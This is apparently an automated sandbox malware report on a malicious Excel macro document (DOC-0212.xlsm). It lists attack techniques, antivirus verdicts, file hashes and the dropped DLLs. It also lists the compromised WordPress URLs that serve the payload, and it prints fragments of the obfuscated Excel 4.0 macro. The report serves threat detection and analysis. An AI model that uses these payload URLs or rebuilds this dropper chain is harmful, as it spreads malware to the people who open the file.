                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Information Discovery15SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        No Antivirus matches

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        3.2.rundll32.exe.1ec0000.7.unpack100%AviraHEUR/AGEN.1110387Download File
                        6.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://schemas.openformatrg/drawml/2006/spreadsheetD0%Avira URL Cloudsafe
                        http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI0%Avira URL Cloudsafe
                        http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
                        http://sadabahar.com.np/wp-inclu0%Avira URL Cloudsafe
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                        http://sadabahar.com.np/wp-i0%Avira URL Cloudsafe
                        http://schemas.open0%URL Reputationsafe
                        http://sadabahar.com.n0%Avira URL Cloudsafe
                        http://sadabahar.c0%Avira URL Cloudsafe
                        http://sadabahar.com0%Avira URL Cloudsafe
                        http://sadabahar.co0%Avira URL Cloudsafe
                        http://www.icra.org/vocabulary/.0%URL Reputationsafe
                        http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad0%Avira URL Cloudsafe
                        http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
                        http://www.duoyuhudong.cn/wp-content/we8xi/vvC:100%Avira URL Cloudmalware
                        http://www.duoyuhudong.cn/wp-content/we8xi/100%Avira URL Cloudmalware
                        http://sadabahar.com.np/wp-includes/pUMqITCt83a/0%Avira URL Cloudsafe
                        http://sadabahar.com.np/wp-includes/pUMqITCt83a/J0%Avira URL Cloudsafe
                        http://www.%s.comPA0%URL Reputationsafe
                        http://sadabahar.com.np/w0%Avira URL Cloudsafe
                        http://sadabahar.com.np/wp-inc0%Avira URL Cloudsafe
                        http://sadabahar.com.np/wp-includes/pUMqITCt83a/A0%Avira URL Cloudsafe
                        http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        www.duoyuhudong.cn
                        47.96.4.95
                        truefalse
                          unknown
                          sadabahar.com.np
                          194.233.67.242
                          truefalse
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.duoyuhudong.cn/wp-content/we8xi/true
                            • Avira URL Cloud: malware
                            unknown
                            http://sadabahar.com.np/wp-includes/pUMqITCt83a/false
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpfalse
                              high
                              http://investor.msn.comEXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpfalse
                                high
                                http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpfalse
                                  high
                                  http://schemas.openformatrg/drawml/2006/spreadsheetDEXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqIEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.openformatrg/package/2006/content-tEXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://sadabahar.com.np/wp-incluEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpfalse
                                    high
                                    http://sadabahar.com.np/wp-iEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.openEXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://sadabahar.com.nEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://sadabahar.cEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://sadabahar.comEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpfalse
                                      high
                                      http://sadabahar.coEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sadEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmpfalse
                                        high
                                        http://www.duoyuhudong.cn/wp-content/we8xi/vvC:EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://investor.msn.com/EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpfalse
                                          high
                                          http://sadabahar.com.np/wp-includes/pUMqITCt83a/JEXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.%s.comPArundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://sadabahar.com.np/wEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://sadabahar.com.np/wp-incEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://sadabahar.com.np/wp-includes/pUMqITCt83a/AEXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/pEXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          47.96.4.95
                                          www.duoyuhudong.cnChina
                                          37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                          194.233.67.242
                                          sadabahar.com.npGermany
                                          6659NEXINTO-DEfalse

                                          General Information

                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                          Analysis ID:532596
                                          Start date:02.12.2021
                                          Start time:14:30:41
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 25s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:DOC-0212.xlsm
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winXLSM@8/7@2/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 18.3% (good quality ratio 17%)
                                          • Quality average: 69.9%
                                          • Quality standard deviation: 26.5%
                                          HCA Information:
                                          • Successful, ratio: 71%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .xlsm
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                          • TCP Packets have been reduced to 100
                                          • Report size getting too big, too many NtOpenKeyEx calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          14:31:57API Interceptor425x Sleep call for process: svchost.exe modified
                                          14:33:30API Interceptor18x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          NEXINTO-DEREMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                          • 194.163.155.54
                                          Sz4lxTmH7r.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          YjKK5XYBzBGet hashmaliciousBrowse
                                          • 212.229.116.92
                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          nkXzJnW7AH.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          sora.arm7Get hashmaliciousBrowse
                                          • 195.179.208.175
                                          kq5Of3SOMZ.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          zMvP34LhcZ.exeGet hashmaliciousBrowse
                                          • 194.163.158.120
                                          KKveTTgaAAsecNNaaaa.arm7-20211122-0650Get hashmaliciousBrowse
                                          • 212.228.109.42
                                          lessie.armGet hashmaliciousBrowse
                                          • 194.195.1.105
                                          CVfKJhwYQW.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          CVfKJhwYQW.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          fXlJhe5OGb.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          pQdDcGbFWFGet hashmaliciousBrowse
                                          • 212.228.240.244
                                          111821 New Order_xlxs.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          e7sNr2qu79.exeGet hashmaliciousBrowse
                                          • 194.195.211.98
                                          X9dXlHMc21Get hashmaliciousBrowse
                                          • 212.228.240.243
                                          PO-No 243563746 Sorg.exeGet hashmaliciousBrowse
                                          • 194.233.74.163
                                          JzMR5r3jptGet hashmaliciousBrowse
                                          • 195.179.60.11
                                          apep.x86Get hashmaliciousBrowse
                                          • 195.179.60.64
                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdsys.exeGet hashmaliciousBrowse
                                          • 8.189.23.166
                                          qu1wfRmk6zGet hashmaliciousBrowse
                                          • 121.197.249.173
                                          xPj5d9l2QgGet hashmaliciousBrowse
                                          • 47.107.174.88
                                          biKMh38rahGet hashmaliciousBrowse
                                          • 42.121.223.186
                                          BX67S7KlgCGet hashmaliciousBrowse
                                          • 47.117.15.214
                                          d2REPCiUoqGet hashmaliciousBrowse
                                          • 8.175.9.99
                                          MTjXit7IJnGet hashmaliciousBrowse
                                          • 39.100.172.144
                                          MA4UA3e5xeGet hashmaliciousBrowse
                                          • 47.122.243.140
                                          9XtX9oou5YGet hashmaliciousBrowse
                                          • 120.77.138.115
                                          7EohYs6rg9Get hashmaliciousBrowse
                                          • 8.132.148.58
                                          rIiLBFxqPWGet hashmaliciousBrowse
                                          • 118.31.165.111
                                          buiodawbdawbuiopdw.arm7Get hashmaliciousBrowse
                                          • 101.133.52.203
                                          buiodawbdawbuiopdw.x86Get hashmaliciousBrowse
                                          • 47.101.55.154
                                          Db89KMtOpLGet hashmaliciousBrowse
                                          • 114.215.209.10
                                          k7L2CA2IN0Get hashmaliciousBrowse
                                          • 114.55.154.126
                                          txAfyNjwr9Get hashmaliciousBrowse
                                          • 8.182.179.241
                                          WzwJmknZ2GGet hashmaliciousBrowse
                                          • 8.188.217.86
                                          45ijGj4CVnGet hashmaliciousBrowse
                                          • 8.129.243.129
                                          armGet hashmaliciousBrowse
                                          • 8.142.57.223
                                          arm7Get hashmaliciousBrowse
                                          • 8.147.204.158

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:downloaded
                                          Size (bytes):372736
                                          Entropy (8bit):7.067308598175135
                                          Encrypted:false
                                          SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyP6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFL6RQKqV4epRmxAvAD
                                          MD5:A328C761D2F253534919BFF4FB3C89B4
                                          SHA1:3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A
                                          SHA-256:FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
                                          SHA-512:EDBAC403FC72ED679599F2000FCE047205329930C33EEB1AC74D12BC8967E9A317997DA7A734524BB04A9022329309CF619B0C82E2B14D300C87A8309ACDC8B1
                                          Malicious:true
                                          Reputation:low
                                          IE Cache URL:http://www.duoyuhudong.cn/wp-content/we8xi/
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..Q.Q.Q.E#.Q.E#..Q.E#.Q./$.Q..$.Q..$.Q..$.Q.E#.Q.Q..Q.Q.Q./$.Q./$.Q.Rich.Q.........PE..L......a.........."!.....f...R............................................................@.................................<...<....................................o..T....................q......0p..@...............T............................text....d.......f.................. ..`.rdata...............j..............@..@.data...D............~..............@....pdata..l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):14200
                                          Entropy (8bit):7.855440184003825
                                          Encrypted:false
                                          SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                                          MD5:4FE798EE522800691796BC9446918C90
                                          SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                                          SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                                          SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                                          Malicious:false
                                          Reputation:low
                                          Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                                          C:\Users\user\AppData\Local\Temp\CC82.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.1464700112623651
                                          Encrypted:false
                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                          MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                          SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                          SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                          SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\~DF09EB9009A60E04D7.TMP
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\Desktop\~$DOC-0212.xlsm
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):165
                                          Entropy (8bit):1.4377382811115937
                                          Encrypted:false
                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                          Malicious:false
                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          C:\Users\user\besta.ocx
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):372736
                                          Entropy (8bit):7.067308598175135
                                          Encrypted:false
                                          SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyP6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFL6RQKqV4epRmxAvAD
                                          MD5:A328C761D2F253534919BFF4FB3C89B4
                                          SHA1:3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A
                                          SHA-256:FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
                                          SHA-512:EDBAC403FC72ED679599F2000FCE047205329930C33EEB1AC74D12BC8967E9A317997DA7A734524BB04A9022329309CF619B0C82E2B14D300C87A8309ACDC8B1
                                          Malicious:true
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..Q.Q.Q.E#.Q.E#..Q.E#.Q./$.Q..$.Q..$.Q..$.Q.E#.Q.Q..Q.Q.Q./$.Q./$.Q.Rich.Q.........PE..L......a.........."!.....f...R............................................................@.................................<...<....................................o..T....................q......0p..@...............T............................text....d.......f.................. ..`.rdata...............j..............@..@.data...D............~..............@....pdata..l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                          C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):372736
                                          Entropy (8bit):7.067308598175135
                                          Encrypted:false
                                          SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyP6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFL6RQKqV4epRmxAvAD
                                          MD5:A328C761D2F253534919BFF4FB3C89B4
                                          SHA1:3186F77C6E45D7D61A678C34F09D8D2BDE35DF1A
                                          SHA-256:FFD90DEC5A531AFABD4E63A87B029C829404F83454D43DE5BAE0CC97912F25FC
                                          SHA-512:EDBAC403FC72ED679599F2000FCE047205329930C33EEB1AC74D12BC8967E9A317997DA7A734524BB04A9022329309CF619B0C82E2B14D300C87A8309ACDC8B1
                                          Malicious:false
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..Q.Q.Q.E#.Q.E#..Q.E#.Q./$.Q..$.Q..$.Q..$.Q.E#.Q.Q..Q.Q.Q./$.Q./$.Q.Rich.Q.........PE..L......a.........."!.....f...R............................................................@.................................<...<....................................o..T....................q......0p..@...............T............................text....d.......f.................. ..`.rdata...............j..............@..@.data...D............~..............@....pdata..l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:Microsoft Excel 2007+
                                          Entropy (8bit):7.6274713659027045
                                          TrID:
                                          • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                          • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                          • ZIP compressed archive (8000/1) 8.08%
                                          File name:DOC-0212.xlsm
                                          File size:38175
                                          MD5:aa4f296ed678b18394a365861777241c
                                          SHA1:cedfd0d995958b8550f36d037c732854e23c68c5
                                          SHA256:20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
                                          SHA512:299cede17c56abdc408a56ecffc934d2f7947d124d3494dd68534e5fe8f0255986335286a8e8799eb64c7ecf99acf45aadbb6df3475ca33ac9a3d4e8e7de6aca
                                          SSDEEP:768:w/I83bP2rjevZCwVIHkvxmUxjfC30+kS4QyoO0VIXlvjyh:wnaIIHkvxXYk4pTVIt2
                                          File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4e2aa8aa4bcbcac

                                          Static OLE Info

                                          General

                                          Document Type:OpenXML
                                          Number of OLE Files:1

                                          OLE File "DOC-0212.xlsm"

                                          Indicators

                                          Has Summary Info:
                                          Application Name:
                                          Encrypted Document:
                                          Contains Word Document Stream:
                                          Contains Workbook/Book Stream:
                                          Contains PowerPoint Document Stream:
                                          Contains Visio Document Stream:
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:

                                          Macro 4.0 Code

                                          4,7,=CHAR('Ss1'!E45)
                                          11,1,o
                                          
                                          1,5,L
                                          11,1,=CHAR('Ss1'!N43)
                                          
                                          2,0,r
                                          10,4,=CHAR('Ss1'!D39)
                                          
                                          1,8,C
                                          12,3,=CHAR('Ss1'!S46)
                                          
